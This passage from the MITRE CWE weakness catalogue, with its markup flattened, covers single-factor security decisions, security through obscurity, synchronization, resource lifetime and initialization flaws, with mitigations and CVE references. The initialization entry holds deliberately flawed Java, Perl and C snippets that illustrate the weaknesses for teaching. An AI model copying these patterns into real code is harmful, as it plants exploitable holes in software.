- - - CWE Content Team - MITRE - 2008-09-08 - updated Alternate_Terms, Common_Consequences, Description, Relationships, Other_Notes, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-01-12 - updated Name - - - CWE Content Team - MITRE - 2010-12-13 - updated Other_Notes, Relationship_Notes, Terminology_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - Design Principle Violation: Insufficient Compartmentalization - - - - A protection mechanism relies exclusively, or to a large extent, on the evaluation of a single condition or the integrity of a single object or entity in order to make a decision about granting access to restricted resources or functionality. - - - - - - - Primary - - - - - - - - Separation of Privilege - Some people and publications use the term "Separation of Privilege" to describe this weakness, but this term has dual meanings in current usage. While this entry is closely associated with the original definition of "Separation of Privilege" by Saltzer and Schroeder, others use the same term to describe poor compartmentalization (CWE-653). Because there are multiple interpretations, use of the "Separation of Privilege" term is discouraged. - - - - - Architecture and Design - - - Implementation - - - Operation - - - - - Access Control - Gain Privileges or Assume Identity - If the single factor is compromised (e.g. by theft or spoofing), then the integrity of the entire security mechanism can be violated with respect to the user that is identified by that factor. - - - Non-Repudiation - Hide Activities - It can become difficult or impossible for the product to be able to distinguish between legitimate activities by the entity who provided the factor, versus illegitimate activities by an attacker. - - - - - Architecture and Design - Use multiple simultaneous checks before granting access to critical operations or granting critical privileges. A weaker but helpful mitigation is to use several successive checks (multiple layers of security). - - - Architecture and Design - Use redundant access rules on different choke points (e.g., firewalls). - - - - - Password-only authentication is perhaps the most well-known example of use of a single factor. Anybody who knows a user's password can impersonate that user. - - - When authenticating, use multiple factors, such as "something you know" (such as a password) and "something you have" (such as a hardware-based one-time password generator, or a biometric device). - - - - - - - - - - - - - - - - - - - - This entry is closely associated with the term "Separation of Privilege." This term is used in several different ways in the industry, but they generally combine two closely related principles: compartmentalization (CWE-653) and using only one factor in a security decision (this entry). Proper compartmentalization implicitly introduces multiple factors into a security decision, but there can be cases in which multiple factors are required for authentication or other mechanisms that do not involve compartmentalization, such as performing all required checks on a submitted certificate. It is likely that CWE-653 and CWE-654 will provoke further discussion. - - - - Pascal Meunier - Purdue University - 2008-01-18 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Alternate_Terms, Common_Consequences, Relationships, Other_Notes, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-01-12 - updated Description, Name - - - CWE Content Team - MITRE - 2009-05-27 - updated Relationships - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Maintenance_Notes, Other_Notes - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Alternate_Terms, Maintenance_Notes - - Design Principle Violation: Reliance on a Single Factor in a Security Decision - - - - The software has a protection mechanism that is too difficult or inconvenient to use, encouraging non-malicious users to disable or bypass the mechanism, whether by accident or on purpose. - - - - - - - Primary - - - - - - - - Architecture and Design - - - Implementation - - - - - Access Control - Bypass Protection Mechanism - By bypassing the security mechanism, a user might leave the system in a less secure state than intended by the administrator, making it more susceptible to compromise. - - - - - Testing - Where possible, perform human factors and usability studies to identify where your product's security mechanisms are difficult to use, and why. - - - Architecture and Design - Make the security mechanism as seamless as possible, while also providing the user with sufficient details when a security decision produces unexpected results. - - - - - In "Usability of Security: A Case Study" [REF-540], the authors consider human factors in a cryptography product. Some of the weakness relevant discoveries of this case study were: users accidentally leaked sensitive information, could not figure out how to perform some tasks, thought they were enabling a security option when they were not, and made improper trust decisions. - - - Enforcing complex and difficult-to-remember passwords that need to be frequently changed for access to trivial resources, e.g., to use a black-and-white printer. Complex password requirements can also cause users to store the passwords in an unsafe manner so they don't have to remember them, such as using a sticky note or saving them in an unencrypted file. - - - Some CAPTCHA utilities produce images that are too difficult for a human to read, causing user frustration. - - - - - - - - - - This weakness covers many security measures causing user inconvenience, requiring effort or causing frustration, that are disproportionate to the risks or value of the protected assets, or that are perceived to be ineffective. - - - - Pascal Meunier - Purdue University - 2008-01-18 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-01-12 - updated Description, Name - - - CWE Content Team - MITRE - 2009-05-27 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, Time_of_Introduction - - Design Principle Violation: Failure to Satisfy Psychological Acceptability - Failure to Satisfy Psychological Acceptability - - - - The software uses a protection mechanism whose strength depends heavily on its obscurity, such that knowledge of its algorithms or key data is sufficient to defeat the mechanism. - This reliance on "security through obscurity" can produce resultant weaknesses if an attacker is able to reverse engineer the inner workings of the mechanism. Note that obscurity can be one small part of defense in depth, since it can create more work for an attacker; however, it is a significant risk if used as the primary means of protection. - - - - - - - - - - Primary - - - - - - - - Never Assuming your secrets are safe - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Confidentiality - Integrity - Availability - Other - Other - The security mechanism can be bypassed easily. - - - - - Architecture and Design - Always consider whether knowledge of your code or design is sufficient to break it. Reverse engineering is a highly successful discipline, and financially feasible for motivated adversaries. Black-box techniques are established for binary analysis of executables that use obfuscation, runtime analysis of proprietary protocols, inferring file formats, and others. - - - Architecture and Design - When available, use publicly-vetted algorithms and procedures, as these are more likely to undergo more extensive security analysis and testing. This is especially the case with encryption and authentication. - - - - - The design of TCP relies on the secrecy of Initial Sequence Numbers (ISNs), as originally covered in CVE-1999-0077. If ISNs can be guessed (due to predictability, CWE-330) or sniffed (due to lack of encryption, CWE-311), then an attacker can hijack or spoof connections. Many TCP implementations have had variations of this problem over the years, including CVE-2004-0641, CVE-2002-1463, CVE-2001-0751, CVE-2001-0328, CVE-2001-0288, CVE-2001-0163, CVE-2001-0162, CVE-2000-0916, and CVE-2000-0328. - - - - - - - - CVE-2006-6588 - Reliance on hidden form fields in a web application. Many web application vulnerabilities exist because the developer did not consider that "hidden" form fields can be processed using a modified client. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6588 - - - CVE-2006-7142 - Hard-coded cryptographic key stored in executable program. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7142 - - - CVE-2005-4002 - Hard-coded cryptographic key stored in executable program. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4002 - - - CVE-2006-4068 - Hard-coded hashed values for username and password contained in client-side script, allowing brute-force offline attacks. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4068 - - - - - - - - Note that there is a close relationship between this weakness and CWE-603 (Use of Client-Side Authentication). If developers do not believe that a user can reverse engineer a client, then they are more likely to choose client-side authentication in the belief that it is safe. - - - - Pascal Meunier - Purdue University - 2008-01-18 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Description, Relationships, Other_Notes, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-01-12 - updated Description, Name - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, Time_of_Introduction - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - Design Principle Violation: Reliance on Security through Obscurity - - - - The product violates well-established principles for secure design. - This can introduce resultant weaknesses or make it easier for developers to introduce related weaknesses during implementation. Because code is centered around design, it can be resource-intensive to fix design problems. - - - - - - Architecture and Design - - - Implementation - - - Operation - - - - - Other - Other - - - - - - - - - CWE Community - 2008-01-30 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The product does not handle or incorrectly handles a file name that identifies a "virtual" resource that is not directly specified within the directory that is associated with the file name, causing the product to perform file-based operations on a resource that is not a file. - Virtual file names are represented like normal file names, but they are effectively aliases for other resources that do not behave like normal files. Depending on their functionality, they could be alternate entities. They are not necessarily listed in directories. - - - - - - - - - Architecture and Design - - - Implementation - - - Operation - - - - - Other - Other - - - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Bytecode Weakness Analysis - including disassembler + source code weakness analysis - - - - - SOAR Partial - - - Manual Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies - - - - - SOAR Partial - - - Dynamic Analysis with Automated Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Web Application Scanner - Web Services Scanner - Database Scanners - - - - - SOAR Partial - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Fuzz Tester - Framework-based Fuzzer - - - - - SOAR Partial - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Focused Manual Spotcheck - Focused manual analysis of source - Manual Source Code Review (not inspections) - - - - - High - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - - - SOAR Partial - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - - - - - High - - - - File Processing - - - File or Directory - - - - Virtual Files - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Taxonomy_Mappings, Type - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Affected_Resources, Applicable_Platforms, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Virtual Files - Failure to Handle File Names that Identify Virtual Resources - - - - The software utilizes multiple threads or processes to allow temporary access to a shared resource that can only be exclusive to one process at a time, but it does not properly synchronize these actions, which might cause simultaneous accesses of this resource by multiple threads or processes. - - Synchronization refers to a variety of behaviors and mechanisms that allow two or more independently-operating processes or threads to ensure that they operate on shared resources in predictable ways that do not interfere with each other. Some shared resource operations cannot be executed atomically; that is, multiple steps must be guaranteed to execute sequentially, without any interference by other processes. Synchronization mechanisms vary widely, but they may include locking, mutexes, and semaphores. When a multi-step operation on a shared resource cannot be guaranteed to execute independent of interference, then the resulting behavior can be unpredictable. Improper synchronization could lead to data or memory corruption, denial of service, etc. - - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Confidentiality - Other - Modify Application Data - Read Application Data - Alter Execution Logic - - - - - Implementation - Use industry standard APIs to synchronize your code. - - - - - SIG00-C - Mask signals handled by noninterruptible signal handlers - - - SIG31-C - Do not access shared objects in signal handlers - CWE More Abstract - - - State synchronization error - - - VNA03-J - Do not assume that a group of calls to independently atomic methods is atomic - - - SFP19 - Missing Lock - - - - - - - - - - Deeper research is necessary for synchronization and related mechanisms, including locks, mutexes, semaphores, and other mechanisms. Multiple entries are dependent on this research, which includes relationships to concurrency, race conditions, reentrant functions, etc. CWE-662 and its children - including CWE-667, CWE-820, CWE-821, and others - may need to be modified significantly, along with their relationships. - - - - CWE Community - 2008-04-11 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2008-10-14 - updated Relationships - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2009-05-27 - updated Relationships - - - CWE Content Team - MITRE - 2010-09-27 - updated Name, Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated Description, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Type - - - CWE Content Team - MITRE - 2019-09-23 - updated Description, Maintenance_Notes, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - Insufficient Synchronization - - - - The software calls a non-reentrant function in a concurrent context in which a competing code sequence (e.g. thread or signal handler) may have an opportunity to call the same function or otherwise influence its state. - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Confidentiality - Other - Modify Memory - Read Memory - Modify Application Data - Read Application Data - Alter Execution Logic - - - - - Implementation - Use reentrant functions if available. - - - Implementation - Add synchronization to your non-reentrant function. - - - Implementation - In Java, use the ReentrantLock Class. - - - - - CVE-2001-1349 - unsafe calls to library functions from signal handler - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1349 - - - CVE-2004-2259 - SIGCHLD signal to FTP server can cause crash under heavy load while executing non-reentrant functions like malloc/free. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2259 - - - - - - - - - - - - CWE Community - 2008-04-11 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated References, Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, References - - - CWE Content Team - MITRE - 2009-03-10 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-09-27 - updated Name, Observed_Examples, Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated Description, Name, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Observed_Examples - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Common_Consequences - - Use of a Non-reentrant Function in an Unsynchronized Context - Use of a Non-reentrant Function in a Multithreaded Context - - - - The software does not maintain or incorrectly maintains control over a resource throughout its lifetime of creation, use, and release. - - Resources often have explicit instructions on how to be created, used and destroyed. When software does not follow these instructions, it can lead to unexpected behaviors and potentially exploitable states. - Even without explicit instructions, various principles are expected to be adhered to, such as "Do not use an object until after its creation is complete," or "do not use an object after it has been slated for destruction." - - - - - - - - Implementation - - - - - Other - Other - - - - - Testing - Use Static analysis tools to check for unreleased resources. - - - - - FIO39-C - Do not alternately input and output from a stream without an intervening flush or positioning call - CWE More Abstract - - - - - - - - - - - More work is needed on this entry and its children. There are perspective/layering issues; for example, one breakdown is based on lifecycle phase (CWE-404, CWE-665), while other children are independent of lifecycle, such as CWE-400. Others do not specify as many bases or variants, such as CWE-704, which primarily covers numbers at this stage. - - - - CWE Content Team - MITRE - 2008-04-11 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Maintenance_Notes, Relationships, Type - - - CWE Content Team - MITRE - 2009-03-10 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Name, Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated Description, Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships, Type - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes, Relationships - - Insufficient Control of a Resource Through its Lifetime - - - - The software does not initialize or incorrectly initializes a resource, which might leave the resource in an unexpected state when it is accessed or used. - This can have security implications when the associated resource is expected to have certain properties or values, such as a variable that determines whether a user has been authenticated or not. - - - - - - Primary - - - Resultant - - - - - - - - Implementation - This weakness can occur in code paths that are not well-tested, such as rare error conditions. This is because the use of uninitialized data would be noticed as a bug during frequently-used functionality. - - - Operation - - - Medium - - - Confidentiality - Read Memory - Read Application Data - When reusing a resource such as memory or a program variable, the original contents of that resource may not be cleared before it is sent to an untrusted party. - - - Access Control - Bypass Protection Mechanism - If security-critical decisions rely on a variable having a "0" or equivalent value, and the programming language performs this initialization on behalf of the programmer, then a bypass of security may occur. - - - Availability - DoS: Crash, Exit, or Restart - The uninitialized data may contain values that cause program flow to change in ways that the programmer did not intend. For example, if an uninitialized variable is used as an array index in C, then its previous contents may produce an index that is outside the range of the array, possibly causing a crash or an exit in other environments. - - - - - Automated Dynamic Analysis - - This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. - Initialization problems may be detected with a stress-test by calling the software simultaneously from a large number of threads or processes, and look for evidence of any unexpected behavior. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. - - Moderate - - - Manual Dynamic Analysis - Identify error conditions that are not likely to occur during normal usage and trigger them. For example, run the program under low memory conditions, run with insufficient privileges or permissions, interrupt a transaction before it is completed, or disable connectivity to basic network services such as DNS. Monitor the software for any unexpected behavior. If you trigger an unhandled exception or similar error that was discovered and handled by the application's environment, it may still indicate unexpected conditions that were not handled by the application itself. - - - - - Requirements - Language Selection - - Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - For example, in Java, if the programmer does not explicitly initialize a variable, then the code could produce a compile-time error (if the variable is local) or automatically initialize the variable to the default value for the variable's type. In Perl, if explicit initialization is not performed, then a default value of undef is assigned, which is interpreted as 0, false, or an equivalent value depending on the context in which the variable is accessed. - - - - Architecture and Design - Identify all variables and data stores that receive information from external sources, and apply input validation to make sure that they are only initialized to expected values. - - - Implementation - Explicitly initialize all your variables and other data stores, either during declaration or just before the first usage. - - - Implementation - Pay close attention to complex conditionals that affect initialization, since some conditions might not perform the initialization. - - - Implementation - Avoid race conditions (CWE-362) during initialization routines. - - - Build and Compilation - Run or compile your software with settings that generate warnings about uninitialized variables or data. - - - Testing - Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible. - - - - - Here, a boolean initiailized field is consulted to ensure that initialization tasks are only completed once. However, the field is mistakenly set to true during static initialization, so the initialization code is never reached. - - private boolean initialized = true;public void someMethod() { - if (!initialized) { - - - // perform initialization tasks - ... - initialized = true; - } - - - - - - The following code intends to limit certain operations to the administrator only. - - $username = GetCurrentUser();$state = GetStateData($username);if (defined($state)) {$uid = ExtractUserID($state);} - - # do stuff - if ($uid == 0) {DoAdminThings();} - - If the application is unable to extract the state information - say, due to a database timeout - then the $uid variable will not be explicitly set by the programmer. This will cause $uid to be regarded as equivalent to "0" in the conditional, allowing the original user to perform administrator actions. Even if the attacker cannot directly influence the state data, unexpected errors could cause incorrect privileges to be assigned to a user just by accident. - - - The following code intends to concatenate a string to a variable and print the string. - - char str[20];strcat(str, "hello world");printf("%s", str); - - This might seem innocent enough, but str was not initialized, so it contains random memory. As a result, str[0] might not contain the null terminator, so the copy might start at an offset other than 0. The consequences can vary, depending on the underlying memory. - If a null terminator is found before str[8], then some bytes of random garbage will be printed before the "hello world" string. The memory might contain sensitive information from previous uses, such as a password (which might occur as a result of CWE-14 or CWE-244). In this example, it might not be a big deal, but consider what could happen if large amounts of memory are printed out before the null terminator is found. - If a null terminator isn't found before str[8], then a buffer overflow could occur, since strcat will first look for the null terminator, then copy 12 bytes starting with that location. Alternately, a buffer over-read might occur (CWE-126) if a null terminator isn't found before the end of the memory segment is reached, leading to a segmentation fault and crash. - - - - - CVE-2001-1471 - chain: an invalid value prevents a library file from being included, skipping initialization of key variables, leading to resultant eval injection. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1471 - - - CVE-2008-3637 - Improper error checking in protection mechanism produces an uninitialized variable, allowing security bypass and code execution. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3637 - - - CVE-2008-4197 - Use of uninitialized memory may allow code execution. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4197 - - - CVE-2008-2934 - Free of an uninitialized pointer leads to crash and possible code execution. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2934 - - - CVE-2007-3749 - OS kernel does not reset a port when starting a setuid program, allowing local users to access the port and gain privileges. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3749 - - - CVE-2008-0063 - Product does not clear memory contents when generating an error message, leading to information leak. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0063 - - - CVE-2008-0062 - Lack of initialization triggers NULL pointer dereference or double-free. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0062 - - - CVE-2008-0081 - Uninitialized variable leads to code execution in popular desktop application. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0081 - - - CVE-2008-3688 - chain: Uninitialized variable leads to infinite loop. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3688 - - - CVE-2008-3475 - chain: Improper initialization leads to memory corruption. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3475 - - - CVE-2008-5021 - Composite: race condition allows attacker to modify an object while it is still being initialized, causing software to access uninitialized memory. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5021 - - - CVE-2005-1036 - Chain: Bypass of access restrictions due to improper authorization (CWE-862) of a user results from an improperly initialized (CWE-909) I/O permission bitmap - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1036 - - - CVE-2008-3597 - chain: game server can access player data structures before initialization has happened leading to NULL dereference - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3597 - - - CVE-2009-2692 - chain: uninitialized function pointers can be dereferenced allowing code execution - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2692 - - - CVE-2009-0949 - chain: improper initialization of memory can lead to NULL dereference - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0949 - - - CVE-2009-3620 - chain: some unprivileged ioctls do not verify that a structure has been initialized before invocation, leading to NULL dereference - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3620 - - - - - Incorrect initialization - - - ARR02-C - Explicitly specify array bounds, even if implicitly defined by an initializer - - - DCL00-J - Prevent class initialization cycles - - - SFP4 - Unchecked Status Condition - - - - - - - - - - - - - - PLOVER - 2008-04-11 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-01-12 - updated Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Modes_of_Introduction, Name, Observed_Examples, Potential_Mitigations, References, Relationships, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-03-10 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences - - - CWE Content Team - MITRE - 2010-02-16 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-04-05 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2010-06-21 - updated Detection_Factors, Potential_Mitigations - - - CWE Content Team - MITRE - 2010-09-27 - updated Observed_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2013-02-21 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Type - - - CWE Content Team - MITRE - 2017-11-08 - updated References, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Observed_Examples - - Incorrect or Incomplete Initialization - - - - The software performs an operation on a resource at the wrong phase of the resource's lifecycle, which can lead to unexpected behaviors. - When a developer wants to initialize, use or release a resource, it is important to follow the specifications outlined for how to operate on that resource and to ensure that the resource is in the expected state. In this case, the software wants to perform a normally valid operation, initialization, use or release, on a resource when it is in the incorrect phase of its lifetime. - - - - - - Implementation - - - - - Other - Other - - - - - Architecture and Design - Follow the resource's lifecycle from creation to release. - - - - - FIO46-C - Do not access a closed file - CWE More Abstract - - - MEM30-C - Do not access freed memory - CWE More Abstract - - - - - CWE Content Team - MITRE - 2008-04-11 - - - Eric 